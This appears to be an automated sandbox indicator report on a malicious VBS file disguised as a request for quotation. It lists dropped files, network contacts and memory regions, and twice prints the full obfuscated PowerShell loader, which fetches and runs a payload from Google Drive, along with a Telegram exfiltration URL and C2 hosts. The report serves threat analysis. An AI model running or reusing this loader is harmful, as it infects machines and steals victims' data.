IOC Report
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs

loading gif

Files

File Path
Type
Category
Malicious
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5aragtt.0ut.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4ajl0fi.ytv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvq4j0pg.osm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mheptb4p.15a.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Kommandocentralens.Qua
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://www.microsoft.cu
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://drive.usercontent.google.com/n
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://drive.usercontent.google.com/Z
unknown
http://checkip.dyndns.org
unknown
http://drive.google.com
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.97.3
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
132.226.8.169
https://aka.ms/pscore6lB
unknown
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://anotherarmy.dns.army:8081
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://reallyfreegeoip.org
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://www.office.com/h
unknown
https://drive.usercontent.googhZ
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://crl.microsU
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
bg.microsoft.map.fastly.net
199.232.210.172
drive.google.com
142.250.186.142
drive.usercontent.google.com
142.250.185.161
checkip.dyndns.com
132.226.8.169

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
132.226.8.169
checkip.dyndns.com
United States
142.250.185.161
drive.usercontent.google.com
United States
142.250.186.142
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
D2B9000
direct allocation
page execute and read and write
malicious
86B0000
direct allocation
page execute and read and write
malicious
23841000
trusted library allocation
page read and write
malicious
26737431000
trusted library allocation
page read and write
malicious
5A48000
trusted library allocation
page read and write
malicious
26610000
trusted library allocation
page read and write
20B02A8F000
heap
page read and write
20B02AC6000
heap
page read and write
25980000
trusted library allocation
page read and write
1E4000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
7183000
heap
page read and write
C92000
heap
page read and write
20B00BC0000
heap
page read and write
25990000
trusted library allocation
page read and write
ECF000
stack
page read and write
25B06000
trusted library allocation
page read and write
26640000
trusted library allocation
page read and write
20B02A71000
heap
page read and write
2389A000
trusted library allocation
page read and write
416000
trusted library allocation
page execute and read and write
49D0000
heap
page execute and read and write
25980000
trusted library allocation
page read and write
6D9D000
stack
page read and write
7129000
heap
page read and write
D60000
trusted library allocation
page read and write
25884000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
540000
heap
page read and write
26640000
trusted library allocation
page read and write
DCB9000
direct allocation
page execute and read and write
7360000
trusted library allocation
page read and write
20B00BCE000
heap
page read and write
238E9000
trusted library allocation
page read and write
23A30000
trusted library allocation
page read and write
20B0294E000
heap
page read and write
26610000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
239F7000
trusted library allocation
page read and write
20B02935000
heap
page read and write
25980000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25990000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
265F0000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
25EA0000
trusted library allocation
page read and write
855E000
stack
page read and write
26640000
trusted library allocation
page read and write
25880000
trusted library allocation
page read and write
26700000
trusted library allocation
page read and write
6DDA000
stack
page read and write
7FFAAC2B0000
trusted library allocation
page read and write
1ED000
trusted library allocation
page execute and read and write
26725785000
heap
page read and write
E63A878000
stack
page read and write
23BBE000
trusted library allocation
page read and write
24AE7000
trusted library allocation
page read and write
25CCC000
heap
page read and write
2477BFE000
stack
page read and write
86D0000
direct allocation
page read and write
267373E1000
trusted library allocation
page read and write
24AF5000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
8080000
trusted library allocation
page read and write
26610000
trusted library allocation
page read and write
6EF5000
heap
page execute and read and write
24AF2000
trusted library allocation
page read and write
D70000
heap
page readonly
40D000
trusted library allocation
page execute and read and write
560000
direct allocation
page read and write
5EF000
heap
page read and write
BB0000
direct allocation
page read and write
26610000
trusted library allocation
page read and write
4C5000
heap
page read and write
265F0000
trusted library allocation
page read and write
238F5000
trusted library allocation
page read and write
266C0000
trusted library allocation
page read and write
20B02963000
heap
page read and write
2374F000
stack
page read and write
25C3B000
heap
page read and write
E63A97E000
stack
